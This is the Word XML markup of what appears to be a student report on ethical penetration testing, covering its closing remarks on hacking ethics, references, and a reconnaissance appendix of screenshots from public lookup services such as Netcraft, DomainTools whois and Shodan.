          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the process of penetration testing a vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="00DD434A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> using tools associated with each phase</w:t>
      </w:r>
      <w:r w:rsidR="007A2F60" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00745212" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> discussed the ethics of </w:t>
      </w:r>
      <w:r w:rsidR="007A2F60" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ethical hacking. </w:t>
      </w:r>
      <w:r w:rsidR="00AE70A9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:r w:rsidR="007A2F60" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r w:rsidR="00AE70A9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">e report, readers should have </w:t>
      </w:r>
      <w:r w:rsidR="00FF5C21" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a comprehensive understanding of the ethical hacking process and the ethics that comes along.</w:t>
      </w:r>
      <w:r w:rsidR="00DD434A" w:rsidRPr="00FA5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2C50A" w14:textId="77777777" w:rsidR="001920B9" w:rsidRPr="00FA5B3B" w:rsidRDefault="001920B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA9F2F" w14:textId="00339C34" w:rsidR="00F314F4" w:rsidRPr="00FA5B3B" w:rsidRDefault="00831E09" w:rsidP="0052149E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:lastRenderedPageBreak/>
        <w:t>Word count: 16</w:t>
      </w:r>
      <w:r w:rsidR="002C0B4C" w:rsidRPr="00FA5B3B">
        <w:t>45</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t>/18</w:t>
      </w:r>
      <w:r w:rsidR="00830949" w:rsidRPr="00FA5B3B">
        <w:t>98</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> total</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="4048182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D362FAC" w14:textId="15E4F829" w:rsidR="001920B9" w:rsidRPr="00FA5B3B" w:rsidRDefault="001920B9">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r w:rsidRPr="00FA5B3B">
            <w:t>References</w:t>
          </w:r>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="109E2158" w14:textId="77777777" w:rsidR="00830949" w:rsidRPr="00FA5B3B" w:rsidRDefault="001920B9" w:rsidP="00830949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FA5B3B">
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidRPr="00FA5B3B">
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
              </w:r>
              <w:r w:rsidRPr="00FA5B3B">
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="00830949" w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Faily, S., McAlaney, J. &amp; Iacob2, C., 2015. </w:t>
              </w:r>
              <w:r w:rsidR="00830949" w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Ethical Dilemmas and Dimensions in Penetration Testing. </w:t>
              </w:r>
              <w:r w:rsidR="00830949" w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">[Online] </w:t>
              </w:r>
              <w:r w:rsidR="00830949" w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:br/>
                <w:t xml:space="preserve">Available at: </w:t>
              </w:r>
              <w:r w:rsidR="00830949" w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.researchgate.net/publication/277308881_Ethical_Dilemmas_and_Dimensions_in_Penetration_Testing</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="1D71D91B" w14:textId="77777777" w:rsidR="00830949" w:rsidRPr="00FA5B3B" w:rsidRDefault="00830949" w:rsidP="00830949">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Nmap, 2023. </w:t>
              </w:r>
              <w:r w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">OS Detection. </w:t>
              </w:r>
              <w:r w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">[Online] </w:t>
              </w:r>
              <w:r w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:br/>
                <w:t xml:space="preserve">Available at: </w:t>
              </w:r>
              <w:r w:rsidRPr="00FA5B3B">
                <w:rPr>
                  <w:noProof/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://nmap.org/book/man-os-detection.html</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="42CFA071" w14:textId="149792BC" w:rsidR="001920B9" w:rsidRPr="00FA5B3B" w:rsidRDefault="001920B9" w:rsidP="00830949">
              <w:r w:rsidRPr="00FA5B3B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EC5A53" w14:textId="77777777" w:rsidR="001920B9" w:rsidRPr="00FA5B3B" w:rsidRDefault="001920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A5B3B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B11F6" w14:textId="6F227B98" w:rsidR="006E0338" w:rsidRPr="00FA5B3B" w:rsidRDefault="001063D9" w:rsidP="00651DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:lastRenderedPageBreak/>
        <w:t>Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78936561" w14:textId="5C9F16FC" w:rsidR="00BD1730" w:rsidRPr="00FA5B3B" w:rsidRDefault="00E21E20" w:rsidP="00BD1730">
      <w:r w:rsidRPr="00FA5B3B">
        <w:t>Large images will be put in the appendices for report readability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E3184" w14:textId="77777777" w:rsidR="00C152EE" w:rsidRPr="00FA5B3B" w:rsidRDefault="00F314F4" w:rsidP="00C152EE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t>Appendix 1: reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952AB15" w14:textId="4EFE490D" w:rsidR="00F314F4" w:rsidRPr="00FA5B3B" w:rsidRDefault="00BE4A5C" w:rsidP="00BE4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C3A48B7" wp14:editId="0C454713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6019165" cy="7421880"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="75788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80128" name="Picture 757880128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" t="35332" r="6830" b="11944"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6019165" cy="742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EE" w:rsidRPr="00FA5B3B">
        <w:t>webs</w:t>
      </w:r>
      <w:r w:rsidR="00077F3A" w:rsidRPr="00FA5B3B">
        <w:t>ite.informer.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFE4131" w14:textId="34BF602C" w:rsidR="00BE4A5C" w:rsidRPr="00FA5B3B" w:rsidRDefault="00BE4A5C" w:rsidP="00BE4A5C"/>
    <w:p w14:paraId="54177EE6" w14:textId="7889245C" w:rsidR="00BE4A5C" w:rsidRPr="00FA5B3B" w:rsidRDefault="00B56AF9" w:rsidP="00ED2B13">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B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736B6D3" wp14:editId="3008968B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31510" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="919302602" name="Picture 59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02602" name="Picture 59" descr="A white sheet of paper with black text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20" b="3190"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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5618" w:rsidRPr="00FA5B3B">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000C26EE" w:rsidRPr="00FA5B3B">
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidR="00705618" w:rsidRPr="00FA5B3B">
        <w:t>report.netcraft.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C139289" w14:textId="2AE8BA42" w:rsidR="001E6F9E" w:rsidRPr="00FA5B3B" w:rsidRDefault="00CA73F0" w:rsidP="001E6F9E">
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B59E115" wp14:editId="15F9ED12">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4323715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="4324350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1004310118" name="Picture 5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0118" name="Picture 53" descr="A map of the world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66"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49DF6D67" wp14:editId="1CC39363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5731510" cy="4333240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1367057885" name="Picture 5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57885" name="Picture 52" descr="A screenshot of a website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7"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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8F1D9D" w14:textId="693ABCE4" w:rsidR="002834F8" w:rsidRPr="00FA5B3B" w:rsidRDefault="002834F8" w:rsidP="00001D3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F42DF9A" w14:textId="77777777" w:rsidR="00CA73F0" w:rsidRPr="00FA5B3B" w:rsidRDefault="00CA73F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A5B3B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16147182" w14:textId="0E9048BC" w:rsidR="00CA73F0" w:rsidRPr="00FA5B3B" w:rsidRDefault="00CA73F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A5B3B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anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50431E53" wp14:editId="50B3CCC5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2457450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="6788785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2074207835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07835" name="Picture 56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B3B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720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15B97272" wp14:editId="6FCAC3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41575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="184029831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98315" name="Picture 1840298315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15"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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8E8D59" w14:textId="77777777" w:rsidR="009B153D" w:rsidRPr="00FA5B3B" w:rsidRDefault="009B15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A5B3B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE081E" w14:textId="0CE0FE42" w:rsidR="009B153D" w:rsidRPr="00FA5B3B" w:rsidRDefault="009B15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A5B3B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anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251723776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AEB00DB" wp14:editId="0B023C2A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6296025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1724691689" name="Picture 58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91689" name="Picture 58" descr="A white sheet of paper with black text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49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5B3B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722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="131A2D07" wp14:editId="5B6D4B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6372225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1508877923" name="Picture 57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77923" name="Picture 57" descr="A screenshot of a web page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3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="63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11A3CA" w14:textId="7B2E1F5E" w:rsidR="00320BF3" w:rsidRPr="00FA5B3B" w:rsidRDefault="006B613E" w:rsidP="008016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A5B3B">
        <w:rPr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724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BF3829E" wp14:editId="7F36266E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3495675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1376301077" name="Picture 60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01077" name="Picture 60" descr="A screenshot of a website&#10;&#10;Description automatically generated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" b="47917"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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5519" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00320BF3" w:rsidRPr="00FA5B3B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F67E86" w14:textId="426C68D8" w:rsidR="00320BF3" w:rsidRPr="00FA5B3B" w:rsidRDefault="002E11D8" w:rsidP="002E11D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B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645AC3A0" wp14:editId="032DC79E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2912533</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>325966</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2824982" cy="8529743"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1089737748" name="Picture 10897377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8921" name="Picture 61" descr="A screenshot of a computer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6" b="602"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2824982" cy="852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605" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17D30B20" wp14:editId="5C88AAB5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804795" cy="8559800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="124635892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8921" name="Picture 61" descr="A screenshot of a computer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6"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2804795" cy="855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605" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>whois.domaintools.com</w:t>
      </w:r>
      <w:r w:rsidR="00801605" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00320BF3" w:rsidRPr="00FA5B3B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57407125" w14:textId="2397A0F0" w:rsidR="00B56AF9" w:rsidRPr="00FA5B3B" w:rsidRDefault="00A71D76" w:rsidP="00E92E7D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6AB74C64" wp14:editId="0ADA8594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2904490" cy="9321800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1049439200" name="Picture 1049439200" descr="A white background with many small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88195" name="Picture 63" descr="A white background with many small colored dots&#10;&#10;Description automatically generated with medium confidence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3" t="47866" r="583" b="9114"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2904490" cy="932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0673" w:rsidRPr="00FA5B3B">
        <w:rPr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2DF58A23" wp14:editId="44F9AE82">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>192828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2903855" cy="9168765"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1985688195" name="Picture 63" descr="A white background with many small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88195" name="Picture 63" descr="A white background with many small colored dots&#10;&#10;Description automatically generated with medium confidence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3" t="5703" r="583" b="52206"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2904631" cy="91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2E7D" w:rsidRPr="00FA5B3B">
        <w:t>Centralops.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3518BB" w14:textId="1F364867" w:rsidR="00E92E7D" w:rsidRPr="00FA5B3B" w:rsidRDefault="00A71D76" w:rsidP="00A71D76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:lastRenderedPageBreak/>
        <w:t>Shodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4058A" w14:textId="00846679" w:rsidR="00A71D76" w:rsidRPr="00FA5B3B" w:rsidRDefault="00985EE8" w:rsidP="00A71D76">
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29A6DD83" wp14:editId="04F4F0B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6055360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1003426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6934" name="Picture 1" descr="A screenshot of a computer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" b="46137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D76" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="567B155E" wp14:editId="05136F9A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4896273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5698067" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="64576657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66578" name="Picture 645766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6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1D76" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B42A941" wp14:editId="36AF804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31510" cy="4936490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="202234307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43071" name="Picture 202234307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A5F89" w14:textId="77777777" w:rsidR="002F1490" w:rsidRPr="00FA5B3B" w:rsidRDefault="002F14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A5B3B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="287C979F" w14:textId="6EB079B3" w:rsidR="002F1490" w:rsidRPr="00FA5B3B" w:rsidRDefault="00676E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A5B3B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CA87546" wp14:editId="189E3DCB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6272953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3259667"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11777947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94765" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated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" t="15267" r="296" b="27673"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="325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772E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F926C01" wp14:editId="7940B781">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2361777</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3936577"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="16798026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02617" name="Picture 1" descr="A screenshot of a computer code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1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="393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1490" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251736064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F7B26FF" wp14:editId="59F45A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3372"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="998131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31734" name="Picture 1" descr="A screenshot of a computer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9"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="242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784631" w14:textId="77777777" w:rsidR="00E919AA" w:rsidRPr="00FA5B3B" w:rsidRDefault="00E919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A5B3B">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF2C9E0" w14:textId="592CB80E" w:rsidR="00E919AA" w:rsidRPr="00FA5B3B" w:rsidRDefault="00EB0F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A5B3B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72154C09" wp14:editId="3B52DC6A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5537200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5730875" cy="3282950"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="111544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49325" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated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42" b="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="573087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5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17B8C7D0" wp14:editId="239DD0B2">
            <wp:simplePos x="0" y="0"/>
